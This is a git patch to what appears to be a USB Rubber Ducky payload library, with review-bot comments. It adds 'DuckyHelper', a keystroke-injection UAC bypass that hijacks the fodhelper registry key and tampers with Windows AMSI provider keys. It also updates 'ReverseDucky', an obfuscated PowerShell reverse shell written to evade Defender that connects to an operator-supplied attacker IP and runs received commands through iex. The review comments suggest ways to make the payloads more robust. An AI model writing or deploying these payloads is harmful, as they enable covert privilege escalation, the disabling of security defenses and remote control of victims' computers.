From f3c751a0467ef7891f9b280b97bdb51cbf9da469 Mon Sep 17 00:00:00 2001 From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Thu, 26 Aug 2021 19:17:31 +0200 Subject: [PATCH] Updated ReverseDucky to v. 1.1 (#17) * Uploaded ReverseDuckyII ReverseDucky2 - A faster way to gain a reverse shell & easier to configure Obfuscated Powershell code to bypass AMSI & Windows Defender. * Update ReverseDucky to v. 1.1 Updated ReverseDucky to version 1.1 - Shorten the code (Now faster than RDII) & still evade Defender. * Update ReverseDucky.txt * Create DuckyHelper UAC bypass for privilege escalation (Method FodHelper) --- payloads/library/execution/DuckyHelper | 47 +++++++++++++++++++ .../library/remote_access/ReverseDucky.txt | 41 +++++----------- 2 files changed, 60 insertions(+), 28 deletions(-) create mode 100644 payloads/library/execution/DuckyHelper diff --git a/payloads/library/execution/DuckyHelper b/payloads/library/execution/DuckyHelper new file mode 100644 index 0000000..ece26fa --- /dev/null +++ b/payloads/library/execution/DuckyHelper 
@@ -0,0 +1,47 @@
+REM DuckyHelper
+REM Version 1.0
+REM OS: Windows 10
+REM Author: 0iphor13
+
+REM UAC bypass for privilege escalation (Method FodHelper)
+REM AV will notify, but payload will still be executed
+REM Payload configured in line 19 & 21 (cmd.exe) : $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Force; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse;[PAYLOAD]
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -WindowStyle hidden -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING $P="cmd.exe /c powershell New-Item 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFF}' -Fo
+DELAY 100
+STRING rce; Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse; cmd.e
+DELAY 100
+STRING xe";Start-Sleep 1;New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force;;New-ItemProperty -Path "HKC
+DELAY 100
+STRING U:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Set-ItemProperty -Path "H
+DELAY 100
+STRING KCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $P -Force;Start-Process "C:\Windows\Sys
+DELAY 100
+STRING tem32\fodhelper.exe" -WindowStyle Hidden;Start-Sleep 3;Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
+DELAY 100
+ENTER
+
+DELAY 5000
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -Exec Bypass
+DELAY 250
+ENTER
+
+DELAY 200
+STRING Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
+DELAY 100
+ENTER
+
+DELAY 300
+STRING exit
+DELAY 100
+ENTER
diff --git a/payloads/library/remote_access/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky.txt
index a3c4ff8..7492c1d 100644
--- a/payloads/library/remote_access/ReverseDucky.txt
+++ b/payloads/library/remote_access/ReverseDucky.txt
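Review bot: The elevated command in `$P` (the `STRING` lines 18–20 of the new file) runs `Remove-Item -Path 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}' -Recurse`, a machine-wide registry change that nothing in this payload undoes — both cleanup steps (line 28 and the second session at line 40) only delete the HKCU `ms-settings` key. The header should state that so an operator knows what the engagement cleanup has to restore; something like `REM NOTE: the elevated payload deletes an AMSI provider key under HKLM; this is NOT reverted by the cleanup below — export/restore it yourself` next to line 8. The key created by `New-Item` on line 18 ends in `...AFF` while the one removed on line 20 ends in `...AFE`; if that difference is intentional, a `REM` saying why will stop someone "fixing" it later. Separately, the first hidden PowerShell session (lines 13–30) is never sent `exit`, so it stays resident after the payload finishes, whereas the second session does get one at line 45.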
@@ -1,12 +1,11 @@
-# ReverseDucky
-# Version 1.0
-# Author: 0iphor13
-#
-# A Reverse shell executed in the background with powershell
-# LINE 23 - Fill the IP blocks (*FIRST BLOCK* etc) - 192 | 168 | 178 | 33
-# LINE 25 - Change *PORT* to Port number
-# DON'T FORGET TO START LISTENER
+REM ReverseDucky
+REM Version 1.1
+REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
+REM Author: 0iphor13
+REM Reverse shell executed in the background
+REM Fill in Attacker IP & Port in line 18
+REM DON'T FORGET TO START LISTENER
 DELAY 1500
 GUI r
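Review bot: The new header claims `REM OS: Windows / Linux(?)`, but the unchanged context line `GUI r` immediately below it drives the Windows Run dialog, so the payload as written has no way to launch on a Linux target regardless of whether PowerShell is installed there; suggest `REM OS: Windows (launches via the Run dialog; not tested elsewhere)`. The reference `Fill in Attacker IP & Port in line 18` is also worth re-checking against the final file — counting the new side of this diff I land on line 17 for the `$I=`/`$P=` STRING, though blank lines lost in this rendering could account for the difference.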
@@ -16,28 +15,14 @@ DELAY 250
 ENTER
 DELAY 200
-STRING SeT-ITeM VARIABLE:Q528Yl ( [TYpE]("{3}{0}{1}{2}" -F '.','eN','cOdinG','TexT') ) ;${clie
+STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl
 DELAY 200
-STRING NT} = &("{1}{0}{2}" -f 'Objec','New-','t') ("{6}{3}{4}{0}{7}{1}{2}{5}{8}" -f'm','.S','oc
+STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n
 DELAY 200
-STRING k','s','te','e','Sy','.Net','ts.TCPClient')(("{4}{1}{3}{0}{2}" -f'*3RD BLOCK*','.*2ND BLOCK*','.*4TH BLOCK*','.','*FIRST BLOCK*'),
+STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | .
 DELAY 200
-STRING PORT);${sTReAM} = ${cliEnt}.("{1}{2}{0}" -f'tream','G','etS').Invoke();[byte[]]${byteS} = 0..655
-DELAY 200
-STRING 35|&('%'){0};while((${I} = ${STReAM}.("{0}{1}"-f 'R','ead').Invoke(${bYtes}, 0, ${ByTES}."lENgt
-DELAY 200
-STRING h")) -ne 0){;${DATa} = (.("{3}{2}{1}{0}" -f 'ect','bj','w-O','Ne') -TypeName ("{2}{0}{3}{4}{1
-DELAY 200
-STRING }"-f 'Tex','IEncoding','System.','t','.ASCI'))."GEtStrING"(${byTes},0, ${I});${senDBaCk} = (.("{0
-DELAY 200
-STRING }{1}"-f'i','ex') ${DATa} 2>&1 | .("{0}{2}{1}"-f 'Out-Str','ng','i') );${SendBACK2} = ${sENDBAc
-DELAY 200
-STRING K} + 'PS ' + (.("{1}{0}" -f 'd','pw'))."pATH" + '> ';${sENDbyte} = ( ( GI VaRiABLE:Q528YL )."vA
-DELAY 200
-STRING LuE"::"ASciI").("{2}{1}{0}"-f 'es','t','GetBy').Invoke(${SENdBaCK2});${STREam}.("{1}{0}"-f 't
-DELAY 200
-STRING e','Wri').Invoke(${sEnDBYTE},0,${SENdBYTE}."LengtH");${sTReAM}.("{1}{0}" -f 'lus
-DELAY 200
-STRING h','F').Invoke()};${cliENt}.("{1}{0}"-f'e','Clos').Invoke()
+STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0,
 DELAY 200
+STRING $sbt.Length);$S.Flush()};$C.Close()
+DELAY 100
 ENTER
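Review bot: The new one-liner starts with the placeholder `$I='0.0.0.0';$P=4444` and nothing guards the `System.Net.Sockets.TCPClient($I,$P)` construction, so an unedited IP or a listener that is not yet up produces a cascade of exceptions (`$S` is null for `GetStream`, `Read`, `Write`) instead of a quiet exit; the connect should be wrapped, e.g. `$C=try{.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient($I,$P)}catch{exit}`, re-chunking the STRING lines accordingly. Whether those errors are visible on the target depends on the `STRING powershell ...` launch line, which is outside this hunk. The loop also shuttles `iex` input and output over a bare `TCPClient` stream with no TLS, the same as v1.0, so a `REM` noting that the channel is plaintext and that anyone on-path can read or inject commands belongs with the "start listener" reminder. Finally, `$C.Close()` is only reached when `Read` returns 0, so any exception inside the `while` leaves the socket open until the process exits.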